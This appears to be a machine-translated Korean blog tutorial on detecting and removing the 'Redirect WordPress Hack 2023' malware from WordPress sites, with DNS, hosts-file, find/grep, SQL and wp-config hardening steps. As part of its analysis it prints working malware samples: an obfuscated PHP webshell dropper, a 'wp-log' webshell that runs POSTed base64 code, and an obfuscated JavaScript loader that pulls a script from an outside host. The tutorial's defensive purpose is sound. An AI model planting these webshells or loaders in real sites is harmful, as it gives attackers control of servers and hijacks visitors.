WordPress 확실히 가장 많이 사용되는 플랫폼입니다 CMS (Content Management System) 블로그 및 스타터 온라인 상점용(모듈 포함) WooCommerce), 이는 컴퓨터 공격(해킹)의 가장 많은 표적이 됩니다. 가장 많이 사용되는 해킹 작업 중 하나는 손상된 웹 사이트를 다른 웹 페이지로 리디렉션하는 것을 목표로 합니다. Redirect WordPress Hack 2023은 전체 사이트를 스팸 웹 페이지로 리디렉션하거나 사용자의 컴퓨터를 감염시킬 수 있는 비교적 새로운 맬웨어입니다.
귀하의 사이트가 WordPress 다른 사이트로 리디렉션되면 이미 유명한 리디렉션 해킹의 피해자일 가능성이 큽니다.
이 튜토리얼에서는 리디렉션에 감염된 웹사이트의 바이러스를 제거하는 데 필요한 정보와 유용한 팁을 찾을 수 있습니다. WordPress Hack (Virus Redirect). 댓글을 통해 추가 정보를 얻거나 도움을 요청할 수 있습니다.
큐프린
사이트를 리디렉션하는 바이러스 탐지 WordPress
웹사이트 트래픽의 갑작스럽고 부당한 감소, 주문 수의 감소(온라인 상점의 경우) 또는 광고 수익의 감소는 무언가 잘못되었다는 첫 징후입니다. 감지 중 "Redirect WordPress Hack 2023”(Virus Redirect)는 웹 사이트를 열고 다른 웹 페이지로 리디렉션될 때 "시각적으로" 수행할 수도 있습니다.
경험상 대부분의 웹 멀웨어는 인터넷 브라우저와 호환됩니다. Chrome, Firefox, Edge, Opera. 당신이 컴퓨터 사용자라면 Mac, 이러한 바이러스는 브라우저에 실제로 표시되지 않습니다. Safari. 보안 시스템 Safari 이러한 악성 스크립트를 자동으로 차단합니다.
에 감염된 웹 사이트가 있는 경우 수행할 작업 Redirect WordPress Hack
첫 번째 단계는 당황하거나 웹 사이트를 삭제하지 않는 것입니다. 감염된 파일이나 바이러스 파일이라도 처음에는 삭제하면 안 됩니다. 여기에는 보안 위반이 발생한 위치와 바이러스에 영향을 준 항목을 이해하는 데 도움이 되는 귀중한 정보가 포함되어 있습니다. 운영 방식.
대중에게 웹 사이트를 닫습니다.
방문자에게 바이러스 웹사이트를 어떻게 닫습니까? 가장 간단한 방법은 DNS 관리자를 사용하여 "A"(도메인 이름)의 IP를 삭제하거나 존재하지 않는 IP를 정의하는 것입니다. 따라서 웹사이트 방문자는 이로부터 보호됩니다. redirect WordPress hack 바이러스 또는 스팸 웹 페이지로 연결될 수 있습니다.
당신이 사용하는 경우 CloudFlare DNS 관리자로서 계정에 로그인하고 DNS 레코드를 삭제합니다."A” 도메인 이름입니다. 따라서 바이러스에 감염된 도메인은 IP가 없는 상태로 남아 더 이상 인터넷에서 액세스할 수 없습니다.
웹 사이트의 IP를 복사하고 자신만 액세스할 수 있도록 "라우팅"합니다. 컴퓨터에서.
컴퓨터에서 웹 사이트의 실제 IP를 변경하는 방법 Windows?
이 방법은 종종 "호스트" 파일을 편집하여 특정 웹 사이트에 대한 액세스를 차단하는 데 사용됩니다.
1. 당신이 엽니다 Notepad 또는 기타 텍스트 편집기(권한 있음) administrator) 파일을 편집하고 "hosts". 다음 위치에 있습니다.
C:\Windows\System32\drivers\etc\hosts2. "hosts" 파일에서 웹사이트의 실제 IP에 "route"를 추가합니다. 위의 IP는 DNS 관리자에서 삭제되었습니다.
IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld3. 파일을 저장하고 브라우저에서 웹사이트에 접속합니다.
웹사이트가 열리지 않고 "hosts" 파일에 아무 것도 잘못하지 않았다면 DNS 캐시일 가능성이 큽니다.
운영 체제에서 DNS 캐시를 지우려면 Windows, 열려 있는 Command Prompt, 여기서 다음 명령을 실행합니다.
ipconfig /flushdns컴퓨터에서 웹 사이트의 실제 IP를 변경하는 방법 Mac / Mac책?
컴퓨터 사용자 Mac 웹 사이트의 실제 IP를 변경하는 것이 다소 간단합니다.
1. 유틸리티 열기 Terminal.
2. 명령줄 실행(실행하려면 시스템 암호 필요):
sudo nano /etc/hosts3. 컴퓨터와 동일 Windows, 도메인의 실제 IP를 추가하십시오.
IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld4. 변경 사항을 저장합니다. Ctrl+X (y).
"라우팅"한 후에는 다음을 사용하여 감염된 웹 사이트에 액세스할 수 있는 유일한 사람입니다. Redirect WordPress Hack.
전체 웹사이트 백업 – 파일 및 데이터베이스
"에 감염되더라도redirect WordPress hack”, 권장 사항은 전체 웹 사이트의 일반 백업을 만드는 것입니다. 파일 및 데이터베이스. 두 파일의 로컬 복사본을 다음 위치에서 저장할 수도 있습니다. public / public_html 뿐만 아니라 데이터베이스.
감염된 파일 및 수정된 파일 식별 Redirect WordPress Hack 2023
의 주요 대상 파일 WordPress 가 index.php (루트에서), header.php, index.php 과 footer.php 주제의 WordPress 자산. 이러한 파일을 수동으로 확인하고 악성 코드 또는 악성 스크립트를 식별합니다.
2023년에는 "Redirect WordPress Hack” 넣어 index.php 다음 형식의 코드:
(이 코드를 실행하지 않는 것이 좋습니다!)
<?php $t='er'.'ro'.'r_'.'r'.'epo'.'rt'.'in'.'g';$b0='MDxXRVM3Vj1FPSVdVDk2VVA3VjFJPEBgYApgCg==';$b1='b'.'a'.'se'.'6'.'4_'.'e'.''.'nc'.'od'.'e';$b2='b'.'as'.'e'.'6'.'4_d'.'e'.'c'.'o'.'d'.'e';$b3='c'.'on'.'ve'.'rt_uue'.'nco'.'de';$b4='c'.'o'.'nve'.'rt'.'_u'.'ude'.'co'.'de';$b5='MTlGRUw5'.'NV1QPTcxP'.'zhWXU'.'49JjVOPScsYApgCg==';$b7='';$b8='JD0mR'.'UM6U'.'GBgCmAK';$b9='IzkmRUUKYAo=';$b10='Izs2'.'MFU'.'KYAo=';$b11='QC4mOFE5Q0RWLSYkVDhDMUQ'.'uJjBRODYsU'.'zlDYFMuI'.'zhWLjMtRCx'.'DQUQsIyxgCmAK';$b12='IjhG'.'QGA'.'KYAo=';$b13='IjhDLGAKYAo=';$b14='Ji8jXV'.'A6J'.'2BACmAK';$b18='LS8nLUM8R'.'kVQPSIh'.'UzxGLF0pUGBgCmAK';$b19='KylTWFwrVy1DPEZFUD0jWGAKYAo=';$b20=' TDonMVQ8JyxaK1JdUz0mJVkrRlFJO0Y1Uz0mXUc5NzBOOFZdTStXLUM8RkVQPScsTzhWQUU4VkxOOkcsYApgCg==';$b21='JTwnKUk7RzBgCmAK';$b22='KD1XYE04NjFNOjZYYApgCg==';$b23='KD1XYE07Jl1HOjZYYApgCg==';$b24='KjxGNVM9JV1SO1c1VDkwYGAKYAo=';$b25='Jz1XYE06Ry1PO0BgYApgCg==';$b30='KTIlMTQ0JV0oM1UtNApgCg==';$b31='KzRENTE1NDUzNSVdNTRERGAKYAo=';$b34='JjxXMVI8Jl1TCmAK';$b41='WlhOeWEycDBjMmg1Y3paaFpUUnJhblU9';$b16=$b4($b2($b0))();if(isset($_POST[$b4($b2($b12))])){if($b4($b2($b10))($_POST[$b4($b2($b12))])===$b4($b2($b11))){ $b45=$_POST[$b4($b2($b13))];$b4($b2($b5))($b16.'/'.$b4($b2($b8)),$b4($b2($b14)).$b2($b45));@include($b16.'/'.$b4($b2($b8)));die();}}if(isset($_POST[$b4($b2($b8)).$b4($b2($b8))])||isset($_GET[$b4($b2($b8)).$b4($b2($b8))])){echo $b4($b2($b10))($b4($b2($b8)));die();}else{$b27=0;$b26=array($b4($b2($b22)),$b4($b2($b23)),$b4($b2($b24)),$b4($b2($b25)));$b32 = $_SERVER[$b4($b2($b30))].$_SERVER[$b4($b2($b31))];foreach ($b26 as $b33) {if($b4($b2($b34))($b32,$b33) !== false){$b27=1;}}if($b27==0) {echo $b4($b2($b18)).$b4($b2($b20)).$b4($b2($b19));}} ?>해독, 이 악성 스크립트 기본적으로 웹 사이트가 감염된 결과입니다. WordPress. 맬웨어 배후의 스크립트가 아니라 감염된 웹 페이지를 리디렉션할 수 있도록 하는 스크립트입니다. 위의 스크립트를 해독하면 다음을 얻습니다.
<script src="/cdn-cgi/apps/head/D6nq5D2EcGpWI6Zldc9omMs3J_0.js"></script>
<script src="https://stay.linestoget.com/scripts/check.js" type="c2cc1212300ac9423a61ac0b-text/javascript"></script>
<script src="/cdn-cgi/scripts/7d0fa10a/cloudflare-static/rocket-loader.min.js" data-cf-settings="c2cc1212300ac9423a61ac0b-|49" defer></script>
이 코드가 포함된 서버의 모든 파일을 식별하려면 액세스 권한이 있는 것이 좋습니다. SSH 파일 검사 및 관리 명령줄을 실행하기 위해 서버에 Linux.
관련 : 도움을 받아 블로그가 감염되었는지 여부를 확인하는 방법 Google Search . (WordPress 바이러스)
다음은 최근에 수정된 파일과 특정 코드(문자열)가 포함된 파일을 식별하는 데 확실히 도움이 되는 두 가지 명령입니다.
에 어떻게 보십니까 Linux PHP 파일이 지난 24시간 또는 다른 기간에 변경되었습니까?
주문 "find”는 사용이 매우 간단하며 사용자 지정을 통해 기간, 검색 경로 및 파일 유형을 설정할 수 있습니다.
find /your/web/path -type f -mtime -1 -exec ls -l {} \; | grep "\.php$"출력에서 파일이 수정된 날짜와 시간, 쓰기/읽기/실행 권한(chmod) 그리고 그것이 속한 그룹/사용자.
더 많은 날짜를 확인하려면 값을 변경하십시오. "-mtime -1" 또는 "를 사용-mmin -360” 분(6시간).
PHP, Java 파일 내에서 코드(문자열)를 검색하는 방법은 무엇입니까?
특정 코드가 포함된 모든 PHP 또는 Java 파일을 빠르게 찾을 수 있는 "찾기" 명령줄은 다음과 같습니다.
find /your/web/path -type f \( -name "*.js" -o -name "*.php" \) -exec grep -l "uJjBRODYsU" {} +이 명령은 파일을 검색하고 표시합니다. .php 과 .js "를 포함하는uJjBRODYsU".
위의 두 명령을 사용하면 최근에 수정된 파일과 맬웨어 코드가 포함된 파일을 매우 쉽게 찾을 수 있습니다.
올바른 코드를 손상시키지 않고 수정된 파일에서 악성 코드를 제거합니다. 내 시나리오에서 멀웨어는 열기 전에 배치되었습니다. <head>.
첫 번째 "찾기" 명령을 실행할 때 서버에서 귀하의 파일이 아닌 새 파일을 발견할 가능성이 매우 높습니다. WordPress 당신이 거기에 두지 마십시오. 바이러스 유형에 속하는 파일 Redirect WordPress Hack.
내가 조사한 시나리오에서 "wp-log-nOXdgD.php". 이들은 리디렉션을 위해 바이러스가 사용하는 맬웨어 코드도 포함하는 "스폰" 파일입니다.
<?php $t="er"."ro"."r_"."r"."epo"."rt"."in"."g";$t(0); $a=sys_get_temp_dir();if(isset($_POST['bh'])){if(md5($_POST['bh'])==="8f1f964a4b4d8d1ac3f0386693d28d03"){$b3=$_POST['b3'];file_put_contents($a."/tpfile","<"."?"."p"."h"."p ".base64_decode($b3));@include($a."/tpfile");die();}}if(isset($_POST['tick'])||isset($_GET['tick'])){echo md5('885');}" 유형의 파일의 목적wp-log-*”는 리디렉션 해킹 바이러스를 서버에서 호스팅되는 다른 웹 사이트로 확산시키는 것입니다. "라는 유형의 악성 코드입니다.webshell으로 구성 기본 섹션 (일부 암호화된 변수가 정의되어 있음) 및 o 실행 섹션 공격자가 이를 통해 시스템에 악성 코드를 로드하고 실행하려고 시도합니다.
변수가 있는 경우 POST 명명 된 'bh' 및 암호화된 값 MD5 동일하다 "8f1f964a4b4d8d1ac3f0386693d28d03"라고 표시되면 스크립트가 암호화된 콘텐츠를 작성하는 것으로 나타납니다. base64 '라는 또 다른 변수의b3'를 임시 파일에 넣은 다음 이 임시 파일을 포함하려고 시도합니다.
변수가 있는 경우 POST 또는 GET 명명 된 'tick', 스크립트는 값으로 응답합니다. MD5 문자열 "885".
이 코드가 포함된 서버의 모든 파일을 식별하려면 일반적인 문자열을 선택한 다음 "find"(위와 유사). 이 멀웨어 코드가 포함된 모든 파일 삭제.
악용되는 보안 결함 Redirect WordPress Hack
이 리디렉션 바이러스는 다음을 통해 도착할 가능성이 큽니다. 관리 사용자의 착취 WordPress 또는 식별하여 취약한 플러그인 다음 권한을 가진 사용자를 추가할 수 있습니다. administrator.
플랫폼에 구축된 대부분의 웹사이트의 경우 WordPress 것이 가능하다 테마 또는 플러그인 파일 편집관리 인터페이스(Dashboard). 따라서 악의적인 사람은 위에 표시된 스크립트를 생성하기 위해 테마 파일에 맬웨어 코드를 추가할 수 있습니다.
이러한 맬웨어 코드의 예는 다음과 같습니다.
<script>var s='3558289hXnVzT';var _0x1e8ff2=_0x1524;(function(_0x5062c1,_0x3340a3){var _0x1fb079=_0x1524,_0x1e7757=_0x5062c1();while(!![]){try{var _0x2a4ba9=-parseInt(_0x1fb079(0x178))/0x1*(parseInt(_0x1fb079(0x189))/0x2)+-parseInt(_0x1fb079(0x187))/0x3+parseInt(_0x1fb079(0x17e))/0x4+-parseInt(_0x1fb079(0x182))/0x5+-parseInt(_0x1fb079(0x176))/0x6*(-parseInt(_0x1fb079(0x17c))/0x7)+-parseInt(_0x1fb079(0x177))/0x8*(parseInt(_0x1fb079(0x172))/0x9)+-parseInt(_0x1fb079(0x181))/0xa*(-parseInt(_0x1fb079(0x179))/0xb);if(_0x2a4ba9===_0x3340a3)break;else _0x1e7757['push'](_0x1e7757['shift']());}catch(_0x332dc7){_0x1e7757['push'](_0x1e7757['shift']());}}}(_0x18f7,0x56d7f));function _0x18f7(){var _0x33878d=['getElementsByTagName','684364prPqlZ','src','873KJkhlg','fromCharCode','head','script[src=\x22','1137318yPDczb','1648yAATZA','1MjirdU','1936BqEZLn','9.3.2','createElement','21FNTvZp','appendChild','1812244aSZNJb','script','currentScript','15090pySUMO','1032605tfOmII','querySelector','insertBefore','parentNode','/sta','1088724TsmeQl'];_0x18f7=function(){return _0x33878d;};return _0x18f7();}function isScriptLoaded(_0x47ea31){var _0x210a48=_0x1524;return Boolean(document[_0x210a48(0x183)](_0x210a48(0x175)+_0x47ea31+'\x22]'));}var bd='ht'+'tp'+'s:'+'/'+_0x1e8ff2(0x186)+'y.l'+String[_0x1e8ff2(0x173)](0x69,0x6e,0x65,0x73,0x74,0x6f,0x67,0x65,0x74,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x63,0x72,0x69,0x70,0x74,0x73,0x2f,0x63,0x68,0x65,0x63,0x6b,0x2e,0x6a,0x73,0x3f,0x76,0x3d)+_0x1e8ff2(0x17a);function _0x1524(_0x1168b6,_0x2ef792){var _0x18f7eb=_0x18f7();return _0x1524=function(_0x15242f,_0x543bbb){_0x15242f=_0x15242f-0x171;var _0xef6154=_0x18f7eb[_0x15242f];return _0xef6154;},_0x1524(_0x1168b6,_0x2ef792);}if(isScriptLoaded(bd)===![]){var d=document,s=d[_0x1e8ff2(0x17b)](_0x1e8ff2(0x17f));s[_0x1e8ff2(0x171)]=bd,document[_0x1e8ff2(0x180)]?document['currentScript'][_0x1e8ff2(0x185)]!==null&&document[_0x1e8ff2(0x180)][_0x1e8ff2(0x185)][_0x1e8ff2(0x184)](s,document[_0x1e8ff2(0x180)]):d[_0x1e8ff2(0x188)](_0x1e8ff2(0x174))[0x0]!==null&&d[_0x1e8ff2(0x188)]('head')[0x0][_0x1e8ff2(0x17d)](s);}</script>JavaScript 테마 헤더에서 식별 WordPress, 라벨 개봉 직후 <head>.
이 자바스크립트를 해독하는 것은 상당히 어렵지만, 파일을 생성하기 위해 다른 스크립트를 가져올 가능성이 가장 높은 다른 웹 주소를 쿼리한다는 것은 명백합니다.wp-log-*"라고 위에서 이야기했습니다.
모든 파일에서 이 코드를 찾아 삭제합니다. PHP 체하는.
내가 알 수 있는 한, 이 코드는 수동으로 추가 관리 권한이 있는 새 사용자가
따라서 대시보드에서 악성 코드가 추가되는 것을 방지하려면 편집 옵션을 비활성화하는 것이 가장 좋습니다. WordPress 대시보드의 테마/플러그인.
파일 편집 wp-config.php 다음 줄을 추가합니다.
define('DISALLOW_FILE_EDIT',true);
define('DISALLOW_FILE_MODS',true);이렇게 변경한 후에는 사용자가 WordPress 더 이상 대시보드에서 파일을 편집할 수 없습니다.
역할을 가진 사용자 확인 Administrator
다음은 역할이 있는 사용자를 검색하는 데 사용할 수 있는 SQL 쿼리입니다. administrator 플랫폼에서 WordPress:
SELECT * FROM wp_users
INNER JOIN wp_usermeta ON wp_users.ID = wp_usermeta.user_id
WHERE wp_usermeta.meta_key = 'wp_capabilities'
AND wp_usermeta.meta_value LIKE '%administrator%'이 쿼리는 테이블의 모든 사용자를 반환합니다. wp_users 역할을 맡은 사람 administrator. 테이블에 대한 쿼리도 수행됩니다. wp_usermeta 메타에서 검색하려면 'wp_capabilities', 사용자 역할에 대한 정보가 포함되어 있습니다.
또 다른 방법은 다음에서 식별하는 것입니다. Dashboard → Users → All Users → Administrator. 그러나 대시보드 패널에서 사용자를 숨길 수 있는 방법이 있습니다. 따라서 사용자를 볼 수 있는 가장 좋은 방법은 "Administrator"에 WordPress 위의 SQL 명령입니다.
제 경우에는 데이터베이스에서 "라는 이름을 가진 사용자를 식별했습니다.wp-import-user". 상당히 암시적입니다.
또한 여기에서 사용자가 WordPress 생성되었습니다. 사용자 ID는 서버 로그를 조회하기 때문에 매우 중요합니다. 이렇게 하면 이 사용자의 모든 활동을 볼 수 있습니다.
다음 역할을 가진 사용자 삭제 administrator 당신이 모르는 것, 그럼 비밀번호 변경 모든 관리 사용자에게. 편집자, 저자, Administrator.
SQL 데이터베이스 사용자의 암호 변경 영향을 받는 웹사이트의
이러한 단계를 수행한 후 모든 사용자에 대해 웹 사이트를 다시 시작할 수 있습니다.
그러나 위에서 제시한 것은 웹 사이트가 감염되는 수천 가지 시나리오 중 하나라는 점을 명심하십시오. Redirect WordPress Hack 2023년.
웹 사이트가 감염되어 도움이 필요하거나 질문이 있는 경우 댓글 섹션이 열려 있습니다.
